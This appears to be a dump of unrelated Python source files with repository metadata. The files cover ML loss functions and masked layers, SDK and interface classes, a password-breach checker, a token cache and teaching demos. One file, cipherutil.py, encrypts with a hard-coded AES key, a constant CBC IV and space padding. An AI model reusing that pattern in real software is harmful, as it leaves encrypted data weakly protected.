dE_dtheta = factor*(1-self.chi*np.cos(theta)*np.cos(2*phi))
dE_dphi = factor*self.chi*np.sin(theta)*np.sin(2*phi)
return np.array([dE_dtheta, dE_dphi])
def get_weight(self, r, tau):
theta = tau[0]
a = 1.0+r*self.r_gs*(np.cos(theta))**(self.Omega-2)
b = 1.0+r*self.r_gs*(np.cos(theta))**self.Omega
if a < self.err and b < self.err:
return float((self.Omega-2))/float(self.Omega)
else:
return (a+self.err)/(b+self.err)
def get_gradient_weight(self, r, tau):
theta = tau[0]
a = 2*(1+r*self.r_gs*(np.cos(theta))**self.Omega)-self.Omega*(np.sin(theta))**2
a *= r*self.r_gs*np.sin(theta)*(np.cos(theta))**(self.Omega-3)
b = (1+r*self.r_gs*(np.cos(theta))**self.Omega)**2
if a < self.err and b < self.err:
return np.array([theta*float((self.Omega-2))/float(self.Omega), 0])
return np.array([(a+self.err)/(b+self.err), 0])
def get_signature_projected_energy(self, r, tau):
return self.get_energy(tau)*self.get_weight(r, tau)
def get_gradient_projected_energy(self, r, tau):
E = self.get_energy(tau)
W = self.get_weight(r, tau)
gradE = self.get_gradient_energy(tau)
gradW = self.get_gradient_weight(r, tau)
return E*gradW + W*gradE
def update_tau(self, tau, gradient, eta0=0.001, beta1=0.9, beta2=0.999, epsilon=1.0E-8):
eta = eta0*np.sqrt(1.0-beta2**self.t)/(1.0-beta1**self.t)
self.m = beta1*self.m+(1.0-beta1)*gradient;
self.v = beta2*self.v+(1.0-beta2)*np.square(gradient);
tau -= eta*np.divide(self.m, np.sqrt(self.v)+epsilon)
self.t += 1
return tau
| 2.703125
| 3
|
neutron/restproxy/util/cipherutil.py
|
wxjinyq01/esdk_neutron_ac
| 0
|
12780128
|
<filename>neutron/restproxy/util/cipherutil.py<gh_stars>0
# coding:utf-8
# import urllib
from Crypto.Cipher import AES
def rsaEncrypt(text, key):
pass
def aesEncrypt(text):
key = '<KEY>'
cryptor = AES.new(key, AES.MODE_CBC, '0123456789123456')
length = 16
count = text.count('')
if count < length:
add = (length-count) + 1
text = text + (' ' * add)
elif count > length:
add = (length-(count % length)) + 1
text = text + (' ' * add)
return cryptor.encrypt(text)
def aesDecrypt(text):
key = '<KEY>'
cryptor = AES.new(key, AES.MODE_CBC, '0123456789123456')
return cryptor.decrypt(text)
def hexStr2Byte(str):
pass
def str2HexByte(str):
array = []
if 16 < len(str):
for index in range(len(str)):
array.insert(index, ord(str[index]))
if 128 < array[index]:
raise NameError
("Illegal characters, the char have to be ascii.")
else:
for index in range(len(str)):
array.insert(index, ord(str[index]))
if 128 < array[index]:
raise NameError
("Illegal characters, the char have to be ascii.")
index = len(str)
while index < 16:
index += 1
array[index] = 0
return array
| 2.953125
| 3
|
cuda_cffi/info.py
|
grlee77/python-cuda-cffi
| 13
|
12780129
|
<reponame>grlee77/python-cuda-cffi
#!/usr/bin/env python
"""
cuda_cffi
=========
cuda_cffi provides python interfaces to a subset of functions defined in the
cuSPARSE and cuSOLVER libraries distributed as part of NVIDIA's CUDA
Programming Toolkit [1]. It is meant to complement the existing scikits.cuda
package [2] which wraps cuBLAS, CULA, etc. This package uses PyCUDA [3]_ to
provide high-level functions comparable to those in the NumPy package [4]_.
Low-level modules
------------------
- cusparse cuSPARSE functions
- cusolver cuSOLVER functions
- misc Miscellaneous support functions.
High-level modules
------------------
- cusparse higher-level cuSPARSE CSR class
.. [1] http://www.nvidia.com/cuda
.. [2] http://scikits.appspot.com/cuda
.. [3] http://mathema.tician.de/software/pycuda/
.. [4] http://numpy.scipy.org/
"""
| 1.710938
| 2
|
cohesity_management_sdk/models/virtual_disk_mapping_response.py
|
nick6655/management-sdk-python
| 18
|
12780130
|
<reponame>nick6655/management-sdk-python
# -*- coding: utf-8 -*-
# Copyright 2021 Cohesity Inc.
import cohesity_management_sdk.models.virtual_disk_id_information
import cohesity_management_sdk.models.protection_source
class VirtualDiskMappingResponse(object):
"""Implementation of the 'VirtualDiskMappingResponse' model.
Specifies information about virtual disks where a user can specify
mappings
of source disk and destination disk to overwrite.
Attributes:
disk_to_overwrite (VirtualDiskIdInformation): Specifies information
about disk which user wants to overwrite. If specified, then
powerOffVmBeforeRecovery must be true.
source_disk (VirtualDiskIdInformation): Specifies information about
the source disk.
target_location (ProtectionSource): Specifies the target location
information, for e.g. a datastore in VMware environment. If
diskToOverwrite is specified, then the target location is
automatically deduced.
"""
# Create a mapping from Model property names to API property names
_names = {
"disk_to_overwrite":'diskToOverwrite',
"source_disk":'sourceDisk',
"target_location":'targetLocation'
}
def __init__(self,
disk_to_overwrite=None,
source_disk=None,
target_location=None):
"""Constructor for the VirtualDiskMappingResponse class"""
# Initialize members of the class
self.disk_to_overwrite = disk_to_overwrite
self.source_disk = source_disk
self.target_location = target_location
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
disk_to_overwrite = cohesity_management_sdk.models.virtual_disk_id_information.VirtualDiskIdInformation.from_dictionary(dictionary.get('diskToOverwrite')) if dictionary.get('diskToOverwrite') else None
source_disk = cohesity_management_sdk.models.virtual_disk_id_information.VirtualDiskIdInformation.from_dictionary(dictionary.get('sourceDisk')) if dictionary.get('sourceDisk') else None
target_location = cohesity_management_sdk.models.protection_source.ProtectionSource.from_dictionary(dictionary.get('targetLocation')) if dictionary.get('targetLocation') else None
# Return an object of this model
return cls(disk_to_overwrite,
source_disk,
target_location)
| 2.765625
| 3
|
lossfunction.py
|
ChristophReich1996/DeepFoveaPP_for_Video_Reconstruction_and_Super_Resolution
| 3
|
12780131
|
from typing import List, Tuple
import torch
import torch.nn as nn
import torch.nn.functional as F
import robust_loss_pytorch
class AdaptiveRobustLoss(nn.Module):
"""
This class implements the adaptive robust loss function proposed by <NAME> for image tensors
"""
def __init__(self, device: str = 'cuda:0', num_of_dimension: int = 3 * 6 * 1024 * 768) -> None:
"""
Constructor method
"""
super(AdaptiveRobustLoss, self).__init__()
# Save parameter
self.num_of_dimension = num_of_dimension
# Init adaptive loss module
self.loss_function = robust_loss_pytorch.AdaptiveLossFunction(num_dims=num_of_dimension, device=device,
float_dtype=torch.float)
def forward(self, prediction: torch.Tensor, label: torch.Tensor) -> torch.Tensor:
"""
Forward pass of the loss module
:param prediction: (torch.Tensor) Prediction
:param label: (torch.Tensor) Corresponding label
:return: (torch.Tensor) Scalar loss value
"""
# Calc difference of the prediction an the label
loss = prediction - label
# Reshape loss to use adaptive loss module
loss = loss.view(-1, self.num_of_dimension)
# Perform adaptive loss
loss = self.loss_function.lossfun(loss)
# Perform mean reduction
loss = loss.mean()
return loss
class WassersteinDiscriminatorLoss(nn.Module):
"""
This class implements the wasserstein loss for a discriminator network
"""
def __init__(self) -> None:
"""
Constructor method
"""
# Call super constructor
super(WassersteinDiscriminatorLoss, self).__init__()
def forward(self, prediction_real: torch.Tensor, prediction_fake: torch.Tensor) -> Tuple[
torch.Tensor, torch.Tensor]:
"""
Forward pass of the loss module
:param prediction_real: (torch.Tensor) Prediction for real samples
:param prediction_fake: (torch.Tensor) Prediction for fake smaples
:return: (torch.Tensor) Scalar loss value
"""
# Compute loss
loss_real = - torch.mean(prediction_real)
loss_fake = torch.mean(prediction_fake)
return loss_real, loss_fake
class WassersteinGeneratorLoss(nn.Module):
"""
This class implements the wasserstein loss for a generator network
"""
def __init__(self) -> None:
"""
Constructor method
"""
# Call super constructor
super(WassersteinGeneratorLoss, self).__init__()
def forward(self, prediction_fake: torch.Tensor) -> torch.Tensor:
"""
Forward pass of the loss module
:param prediction_fake: (torch.Tensor) Prediction for fake smaples
:return: (torch.Tensor) Scalar loss value
"""
# Compute loss
loss = - torch.mean(prediction_fake)
return loss
class NonSaturatingLogisticGeneratorLoss(nn.Module):
'''
Implementation of the non saturating GAN loss for the generator network
Source: https://github.com/ChristophReich1996/BCS_Deep_Learning/blob/master/Semantic_Pyramid_Style_Gan_2/lossfunction.py
'''
def __init__(self) -> None:
'''
Constructor method
'''
# Call super constructor
super(NonSaturatingLogisticGeneratorLoss, self).__init__()
def __repr__(self):
'''
Get representation of the loss module
:return: (str) String including information
'''
return '{}'.format(self.__class__.__name__)
def forward(self, prediction_fake: torch.Tensor) -> torch.Tensor:
'''
Forward pass to compute the generator loss
:param prediction_fake: (torch.Tensor) Prediction of the discriminator for fake samples
:return: (torch.Tensor) Loss value
'''
# Calc loss
loss = torch.mean(F.softplus(-prediction_fake))
return loss
class NonSaturatingLogisticDiscriminatorLoss(nn.Module):
'''
Implementation of the non saturating GAN loss for the discriminator network
Source: https://github.com/ChristophReich1996/BCS_Deep_Learning/blob/master/Semantic_Pyramid_Style_Gan_2/lossfunction.py
'''
def __init__(self) -> None:
'''
Constructor
'''
# Call super constructor
super(NonSaturatingLogisticDiscriminatorLoss, self).__init__()
def forward(self, prediction_real: torch.Tensor, prediction_fake: torch.Tensor) -> Tuple[
torch.Tensor, torch.Tensor]:
'''
Forward pass. Loss parts are not summed up to not retain the whole backward graph later.
:param prediction_real: (torch.Tensor) Prediction of the discriminator for real images
:param prediction_fake: (torch.Tensor) Prediction of the discriminator for fake images
:return: (torch.Tensor) Loss values for real and fake part
'''
# Calc real loss part
loss_real = torch.mean(F.softplus(-prediction_real))
# Calc fake loss part
loss_fake = torch.mean(F.softplus(prediction_fake))
return loss_real, loss_fake
class PerceptualLoss(nn.Module):
"""
This class implements perceptual loss
"""
def __init__(self, loss_function: nn.Module = nn.L1Loss(reduction='mean')) -> None:
"""
Constructor method
:param loss_function: (nn.Module) Loss function to be utilized to construct the perceptual loss
"""
# Call super constructor
super(PerceptualLoss, self).__init__()
# Save loss function
self.loss_function = loss_function
def forward(self, features_prediction: List[torch.Tensor], features_label: List[torch.Tensor]) -> torch.Tensor:
"""
Forward pass of the loss module
:param features_prediction: (List[torch.Tensor]) List of VGG-19 features of the prediction
:param features_label: (List[torch.Tensor]) List of VGG-19 features of the label
:return: (torch.Tensor) Scalar loss value
"""
# Init loss value
loss = torch.tensor(0.0, dtype=torch.float, device=features_prediction[0].device)
# Loop over all features
for feature_prediction, feature_label in zip(features_prediction, features_label):
# Calc loss and sum up
loss = loss + self.loss_function(feature_prediction, feature_label)
# Average loss with number of features
loss = loss / len(features_prediction)
return loss
| 3.265625
| 3
|
pwcheck.py
|
madfordmac/scripts
| 0
|
12780132
|
<reponame>madfordmac/scripts
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
from hashlib import sha1
import requests
import argparse
import sys, os
parser = argparse.ArgumentParser(description="Check your password against the https://haveibeenpwned.com/ API.")
parser.add_argument('-q', '--quiet', action="store_true", help="No STDOUT. Only output is via return code.")
parser.add_argument("passwd", nargs="?", help="Password to check. If not provided, will also check $PWCHECK or prompt.")
def check_hash(h):
"""
Do the heavy lifting. Take the hash, poll the haveibeenpwned API, and check results.
:param h: The sha1 hash to check
:return: The number of times the password has been found (0 is good!)
"""
if len(h) != 40:
raise ValueError("A sha1 hash should be 30 characters.")
h = h.upper()
chk = h[:5]
r = requests.get("https://api.pwnedpasswords.com/range/%s" % chk)
if r.status_code != 200:
raise EnvironmentError("Unable to retrieve password hashes from server.")
matches = {m: int(v) for (m, v) in [ln.split(':') for ln in r.content.decode('utf-8').split("\r\n")]}
#print("Prefix search returned %d potential matches." % len(matches))
for m in matches.keys():
if m == h[5:]:
return matches[m]
return 0
def check_password(p):
"""
Convenience function that calculates the hash for you, then runs check_hash.
:param p: The password to check
:return: The check_hash result for the password
"""
s = sha1()
s.update(p.encode('utf-8'))
return check_hash(s.hexdigest())
def main(args):
passwd = ''
if args.passwd:
passwd = args.passwd
elif 'PWCHECK' in os.environ:
passwd = os.environ['PWCHECK']
else:
from getpass import getpass
passwd = getpass()
r = check_password(passwd)
if r > 0:
args.quiet or print("Passwod found on %d lists." % r)
sys.exit(1)
else:
args.quiet or print("Password has not been compromised.")
sys.exit(0)
if __name__ == '__main__':
args = parser.parse_args()
main(args)
| 3.5625
| 4
|
auth.py
|
Bociany/Moodai
| 0
|
12780133
|
<reponame>Bociany/Moodai<filename>auth.py
from pymemcache.client.base import Client
import secrets
import hashlib
memcached_client = Client(("localhost", 11211))
TOKEN_EXPIRATION = 60*60*24
print("auth: memcached hot token cache backend started!")
# Generates a new token for a user
def generate_token(id):
token = secrets.token_urlsafe(32)
memcached_client.set(token, id, expire=TOKEN_EXPIRATION)
return token
def remove_token(token):
if (token_exists(token)):
memcached_client.delete(token)
def token_exists(token):
return memcached_client.get(token) is not None
# Verifies if a token is proper
def verify_token(token):
cached_id = memcached_client.get(token)
if cached_id is not None:
return cached_id
def hash_multiple(arr):
hash = hashlib.sha3_256()
for obj in arr:
hash.update(obj.encode('utf-8'))
return hash.hexdigest()
| 2.703125
| 3
|
demos/python/sdk_wireless_camera_control/open_gopro/interfaces.py
|
hypoxic/OpenGoPro
| 1
|
12780134
|
<gh_stars>1-10
# interfaces.py/Open GoPro, Version 1.0 (C) Copyright 2021 GoPro, Inc. (http://gopro.com/OpenGoPro).
# This copyright was auto-generated on Tue May 18 22:08:50 UTC 2021
"""Interfaces that must be defined outside of other files to avoid circular imports."""
from abc import ABC, abstractmethod
from typing import Callable, Generic, Pattern, Optional, List, Tuple, TypeVar
from open_gopro.services import AttributeTable
NotiHandlerType = Callable[[int, bytes], None]
BleDevice = TypeVar("BleDevice")
BleClient = TypeVar("BleClient")
class BLEController(ABC, Generic[BleClient, BleDevice]):
"""Interface definition for a BLE driver to be used by GoPro."""
@abstractmethod
async def read(self, client: BleClient, uuid: str) -> bytearray:
"""Read a bytestream response from a UUID.
Args:
client (Client): client to pair to
uuid (UUID): UUID to read from
Returns:
bytearray: response
"""
raise NotImplementedError
@abstractmethod
async def write(self, client: BleClient, uuid: str, data: bytearray) -> None:
"""Write a bytestream to a UUID.
Args:
client (Client): client to pair to
uuid (UUID): UUID to write to
data (bytearray): bytestream to write
Returns:
bytearray: response
"""
raise NotImplementedError
@abstractmethod
async def scan(self, token: Pattern, timeout: int = 5) -> BleDevice:
"""Scan BLE device with a regex in it's device name.
Args:
token (Pattern): Regex to scan for
timeout (int, optional): [description]. Defaults to 5.
Returns:
Device: discovered device (shall not be multiple devices)
"""
raise NotImplementedError
@abstractmethod
async def connect(self, device: BleDevice, timeout: int = 15) -> BleClient:
"""Connect to a BLE device.
Args:
device (Device): device to connect to
timeout (int, optional): Timeout before considering connection establishment a failure. Defaults to 15.
Returns:
Client: client that has been connected to
"""
raise NotImplementedError
@abstractmethod
async def pair(self, client: BleClient) -> None:
"""Pair to an already connected client.
Args:
client (Client): client to pair to
"""
raise NotImplementedError
@abstractmethod
async def enable_notifications(self, client: BleClient, handler: NotiHandlerType) -> None:
"""Enable notifications for all notifiable characteristics.
The handler is used to register for notifications. It will be called when a a notification
is received.
Args:
client (Client): client to enable notifications on
handler (Callable): notification handler
"""
raise NotImplementedError
@abstractmethod
async def discover_chars(self, client: BleClient) -> AttributeTable:
"""Discover all characteristics for a connected client.
Args:
client (Client): client to discover on
Returns:
AttributeTable: dictionary of discovered services and characteristics indexed by UUID
"""
raise NotImplementedError
@abstractmethod
async def disconnect(self, client: BleClient) -> bool:
"""Terminate the BLE connection.
Args:
client (Client): client to disconnect from
"""
raise NotImplementedError
class WifiController(ABC):
"""Interface definition for a Wifi driver to be used by GoPro."""
@abstractmethod
def connect(self, ssid: str, password: str, timeout: float = 15) -> bool:
"""Connect to a network.
Args:
ssid (str): SSID of network to connect to
password (str): password of network to connect to
timeout (float, optional): Time before considering connection failed (in seconds). Defaults to 15.
Returns:
bool: True if successful, False otherwise
"""
raise NotImplementedError
@abstractmethod
def disconnect(self) -> bool:
"""Disconnect from a network.
Returns:
bool: True if successful, False otherwise
"""
raise NotImplementedError
@abstractmethod
def current(self) -> Tuple[Optional[str], Optional[str]]:
"""Return the SSID and state of the current network.
Returns:
Tuple[Optional[str], Optional[str]]: Tuple of SSID and state. State is optional. If SSID is None,
there is no current connection
"""
raise NotImplementedError
@abstractmethod
def interfaces(self) -> List[str]:
"""Return a list of wireless adapters.
Returns:
List[str]: adapters
"""
raise NotImplementedError
@abstractmethod
def interface(self, interface: Optional[str]) -> Optional[str]:
"""Get or set the currently used wireless adapter.
Args:
interface (str, optional): Get if the interface parameter is None. Set otherwise. Defaults to None.
Returns:
Optional[str]: Name of interface if get. None if set.
"""
raise NotImplementedError
@abstractmethod
def power(self, power: bool) -> None:
"""Enable / disable the wireless driver.
Args:
power (bool, optional): Enable if True. Disable if False.
"""
raise NotImplementedError
@property
@abstractmethod
def is_on(self) -> bool:
"""Is the wireless driver currently enabled.
Returns:
bool: True if yes. False if no.
"""
raise NotImplementedError
class GoProError(Exception):
"""Base class for other exceptions."""
def __init__(self, message: str) -> None:
super().__init__(f"GoPro Error: {message}")
class ScanFailedToFindDevice(GoProError):
"""The scan failed without finding a device."""
def __init__(self) -> None:
super().__init__("A scan timed out without finding a device")
class ConnectFailed(GoProError):
"""A BLE or WiFi connection failed to establish
Args:
connection (str): type of connection that failed
retries (int): how many retries were attempted
timeout (int): the timeout used for each attempt
"""
def __init__(self, connection: str, timeout: float, retries: int):
super().__init__(
f"{connection} connection failed to establish after {retries} retries with timeout {timeout}"
)
class ResponseTimeout(GoProError):
"""A response has timed out."""
def __init__(self, timeout: float) -> None:
super().__init__(f"Response timeout occurred of {timeout} seconds")
class GoProNotInitialized(GoProError):
"""A command was attempted without waiting for the GoPro instance to initialize."""
def __init__(self) -> None:
super().__init__("GoPro has not been initialized yet")
| 2.296875
| 2
|
ProgettoLube/WebInspector/venv/Lib/site-packages/tensorflow/_api/v2/compat/v1/feature_column/__init__.py
|
Lube-Project/ProgettoLube
| 2
|
12780135
|
<filename>ProgettoLube/WebInspector/venv/Lib/site-packages/tensorflow/_api/v2/compat/v1/feature_column/__init__.py
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Public API for tf.feature_column namespace.
"""
from __future__ import print_function as _print_function
import sys as _sys
from tensorflow.python.feature_column.feature_column import input_layer
from tensorflow.python.feature_column.feature_column import linear_model
from tensorflow.python.feature_column.feature_column import make_parse_example_spec
from tensorflow.python.feature_column.feature_column_v2 import bucketized_column
from tensorflow.python.feature_column.feature_column_v2 import categorical_column_with_hash_bucket
from tensorflow.python.feature_column.feature_column_v2 import categorical_column_with_identity
from tensorflow.python.feature_column.feature_column_v2 import categorical_column_with_vocabulary_file
from tensorflow.python.feature_column.feature_column_v2 import categorical_column_with_vocabulary_list
from tensorflow.python.feature_column.feature_column_v2 import crossed_column
from tensorflow.python.feature_column.feature_column_v2 import embedding_column
from tensorflow.python.feature_column.feature_column_v2 import indicator_column
from tensorflow.python.feature_column.feature_column_v2 import numeric_column
from tensorflow.python.feature_column.feature_column_v2 import shared_embedding_columns
from tensorflow.python.feature_column.feature_column_v2 import weighted_categorical_column
from tensorflow.python.feature_column.sequence_feature_column import sequence_categorical_column_with_hash_bucket
from tensorflow.python.feature_column.sequence_feature_column import sequence_categorical_column_with_identity
from tensorflow.python.feature_column.sequence_feature_column import sequence_categorical_column_with_vocabulary_file
from tensorflow.python.feature_column.sequence_feature_column import sequence_categorical_column_with_vocabulary_list
from tensorflow.python.feature_column.sequence_feature_column import sequence_numeric_column
del _print_function
| 1.851563
| 2
|
setup.py
|
ImperialCollegeLondon/guikit
| 3
|
12780136
|
"""
Only needed to install the tool in editable mode. See:
https://setuptools.readthedocs.io/en/latest/userguide/quickstart.html#development-mode
"""
import setuptools
setuptools.setup()
| 0.914063
| 1
|
lambo/models/masked_layers.py
|
samuelstanton/lambo
| 10
|
12780137
|
<reponame>samuelstanton/lambo
import torch
import torch.nn as nn
class Apply(nn.Module):
def __init__(self, module, dim=0):
super().__init__()
self.module = module
self.dim = dim
def forward(self, x):
xs = list(x)
xs[self.dim] = self.module(xs[self.dim])
return xs
class LayerNorm1d(nn.BatchNorm1d):
"""n-dimensional batchnorm that excludes points outside the mask from the statistics"""
def forward(self, x):
"""input (B,c,n), computes statistics averaging over c and n"""
sum_dims = list(range(len(x.shape)))[1:]
xmean = x.mean(dim=sum_dims, keepdims=True)
xxmean = (x * x).mean(dim=sum_dims, keepdims=True)
var = xxmean - xmean * xmean
std = var.clamp(self.eps) ** 0.5
ratio = self.weight[:, None] / std
output = x * ratio + (self.bias[:, None] - xmean * ratio)
return output
class MaskLayerNorm1d(nn.LayerNorm):
"""
Custom masked layer-norm layer
"""
def forward(self, inp: tuple):
x, mask = inp
batch_size, num_channels, num_tokens = x.shape
reshaped_mask = mask[:, None]
sum_dims = list(range(len(x.shape)))[1:]
xsum = x.sum(dim=sum_dims, keepdims=True)
xxsum = (x * x).sum(dim=sum_dims, keepdims=True)
numel_notnan = reshaped_mask.sum(dim=sum_dims, keepdims=True) * num_channels
xmean = xsum / numel_notnan
xxmean = xxsum / numel_notnan
var = xxmean - (xmean * xmean)
std = var.clamp(self.eps) ** 0.5
ratio = self.weight / std
output = (x - xmean) * ratio + self.bias
return output, mask
class MaskBatchNormNd(nn.BatchNorm1d):
"""n-dimensional batchnorm that excludes points outside the mask from the statistics"""
def forward(self, inp):
"""input (*, c), (*,) computes statistics averaging over * within the mask"""
x, mask = inp
sum_dims = list(range(len(x.shape)))[:-1]
x_or_zero = torch.where(
mask.unsqueeze(-1) > 0, x, torch.zeros_like(x)
) # remove nans
if self.training or not self.track_running_stats:
xsum = x_or_zero.sum(dim=sum_dims)
xxsum = (x_or_zero * x_or_zero).sum(dim=sum_dims)
numel_notnan = (mask).sum()
xmean = xsum / numel_notnan
sumvar = xxsum - xsum * xmean
unbias_var = sumvar / (numel_notnan - 1)
bias_var = sumvar / numel_notnan
self.running_mean = (
1 - self.momentum
) * self.running_mean + self.momentum * xmean.detach()
self.running_var = (
1 - self.momentum
) * self.running_var + self.momentum * unbias_var.detach()
else:
xmean, bias_var = self.running_mean, self.running_var
std = bias_var.clamp(self.eps) ** 0.5
ratio = self.weight / std
output = x_or_zero * ratio + (self.bias - xmean * ratio)
return (output, mask)
class mMaxPool1d(nn.MaxPool1d):
def __init__(self, *args, **kwargs):
super().__init__(*args, return_indices=True, **kwargs)
def forward(self, inp):
x, mask = inp
x = x * mask[:, None]
pooled_x, pool_ids = super().forward(x)
pooled_mask = (
mask[:, None].expand_as(x).gather(dim=2, index=pool_ids).any(dim=1)
)
# potential problem if largest non masked inputs are negative from previous layer?
return pooled_x, pooled_mask
class mAvgPool1d(nn.AvgPool1d):
def forward(self, inp):
x, mask = inp
naive_avg_x = super().forward(x)
avg_mask = super().forward(mask[:, None])
return naive_avg_x / (avg_mask + 1e-5), (avg_mask[:, 0] > 0).float()
@torch.jit.script
def fused_swish(x):
return x * x.sigmoid()
class mResidualBlock(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, layernorm, dropout_p=0.1, act_fn='swish', stride=1
):
super().__init__()
self.conv_1 = nn.Conv1d(
in_channels, out_channels, kernel_size, padding='same', stride=stride, bias=False
)
self.conv_2 = nn.Conv1d(
out_channels, out_channels, kernel_size, padding='same', stride=stride
)
if layernorm:
self.norm_1 = MaskLayerNorm1d(normalized_shape=[in_channels, 1])
self.norm_2 = MaskLayerNorm1d(normalized_shape=[out_channels, 1])
else:
self.norm_1 = MaskBatchNormNd(in_channels)
self.norm_2 = MaskBatchNormNd(out_channels)
if act_fn == 'swish':
self.act_fn = fused_swish
else:
self.act_fn = nn.ReLU(inplace=True)
if not in_channels == out_channels:
self.proj = nn.Conv1d(
in_channels, out_channels, kernel_size=1, padding='same', stride=1)
else:
self.proj = None
self.dropout = nn.Dropout(dropout_p)
def forward(self, inputs):
# assumes inputs are already properly masked
resid, mask = inputs
x, _ = self.norm_1((resid, mask))
x = mask[:, None] * x
x = self.act_fn(x)
x = self.conv_1(x)
x = mask[:, None] * x
x, _ = self.norm_2((x, mask))
x = mask[:, None] * x
x = self.act_fn(x)
x = self.conv_2(x)
if self.proj is not None:
resid = self.proj(resid)
x = mask[:, None] * (x + resid)
return self.dropout(x), mask
class mConvNormAct(nn.Module):
def __init__(self, in_channels, out_channels, layernorm=False, ksize=5, stride=1):
super().__init__()
self.conv = nn.Conv1d(
in_channels, out_channels, ksize, padding='same', stride=stride
)
if layernorm:
self.norm = MaskLayerNorm1d(normalized_shape=[out_channels, 1])
else:
self.norm = MaskBatchNormNd(out_channels)
def forward(self, inp):
x, mask = inp
x = self.conv(x)
x = mask[:, None] * x
x, _ = self.norm((x, mask))
x = mask[:, None] * x
x = fused_swish(x)
return x, mask
| 2.578125
| 3
|
Python/SinglyLinkedList.py
|
Nikhil-Sharma-1/DS-Algo-Point
| 1,148
|
12780138
|
class Node:
def __init__(self, data):
self.data = data
self.next = None
class SinglyLinkedList:
def __init__(self):
self.head = None
self.pos = None
def insert(self, data):
newNode = Node(data)
if self.head == None:
self.head = newNode
self.pos = newNode
else:
tmp = self.pos.next
self.pos.next = newNode
self.pos = newNode
if tmp != None:
newNode.next = tmp
def delete(self):
if self.pos == self.head:
self.pos = self.pos.next
del self.head
self.head = self.pos
else:
tmp = self.head
while tmp.next != self.pos:
tmp = tmp.next
tmp.next = self.pos.next
del self.pos
self.pos = tmp
def reset(self):
self.pos = self.head
def advance(self):
if self.pos != None:
self.pos = self.pos.next
def out_of_list(self):
if self.pos == None:
return True
else:
return False
def pos_position(self):
if not (self.out_of_list()):
return self.pos.data
else:
return "pos is out of list"
def print_list(self):
if self.head == None:
print("List is empty")
else:
tmp = self.head
while tmp != None:
print(tmp.data)
tmp = tmp.next
run = True
sll = SinglyLinkedList()
while run:
print( "\ni [insert] insert element")
print( "d [delete] delete element")
print( "o [out] out_of_list ?")
print( "p [pos] current position of pos")
print( "r [reset] pos-pointer")
print( "a [advance] pos-pointer")
print( "pr [print] print list")
print( "q [quit] program")
choice = input()
if choice == "i":
num = input("Enter Data for insertion: ")
sll.insert(num)
elif choice == "d":
sll.delete()
elif choice == "o":
print(sll.out_of_list())
elif choice == "r":
sll.reset()
elif choice == "a":
sll.advance()
elif choice == "p":
print(sll.pos_position())
elif choice == "q":
run = False
elif choice == "pr":
sll.print_list()
else:
print("Invalid Input")
"""
Sample I/O:
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
i (Userinput)
Enter Data for insertion: 10
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
i (Userinput)
Enter Data for insertion: 20
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
pr (Userinput)
10
20
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
p (Userinput)
20
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
a (Userinput)
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
o (Userinput)
True
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
r (Userinput)
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
p (Userinput)
10
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
d (Userinput)
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
pr (Userinput)
20
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
p (Userinput)
20
i [insert] insert element
d [delete] delete element
o [out] out_of_list ?
p [pos] current position of pos
r [reset] pos-pointer
a [advance] pos-pointer
pr [print] print list
q [quit] program
q (Userinput)
Time Complexity:
Insert: O(1)
Delete: O(N)
PrintList: O(N)
Everything Else: O(1)
"""
| 3.90625
| 4
|
Python/ds/Firstfit.py
|
Khushboo85277/NeoAlgo
| 897
|
12780139
|
"""
First fit is the simplest of all the storage allocation strategies.
Here the list of storages is searched and as soon as a free storage block of size >= N is found ,
the pointer of that block is sent to the calling program after retaining the residue space.Thus, for example,
for a block of size 5k , 2k memory will be sent to the caller . The below program is a simulation of the first fit strategy
using array data structure.
"""
# Block class is used as the fixed memory blocks for allocation
class Block:
def __init__(self):
self.size = 0
self.ID = 0
self.fragment = 0
# process class is used for allocating memory for the requesting processes
class process:
def __init__(self):
self.Num = 0
self.size = 0
self.block = None
# initialiseBlocks function initializes all the blocks with sizes and id
def initialiseBlocks(arr, sizes, n):
for i in range(n):
arr[i].size = sizes[i]
arr[i].fragment = sizes[i]
arr[i].ID = i + 1
# printResult function prints the result of the memory allocation strategy
def printResult(arr2, numOfProcess):
print(
"Process No Process Size Block ID Block Size Block Fragment"
)
for i in range(numOfProcess):
print(
str(arr2[i].Num)
+ " "
+ str(arr2[i].size)
+ " "
+ str(arr2[i].block.ID)
+ " "
+ str(arr2[i].block.size)
+ " "
+ str(arr2[i].block.fragment)
)
# firstfit function allocates memory to processes using firstfit allocation algorithm
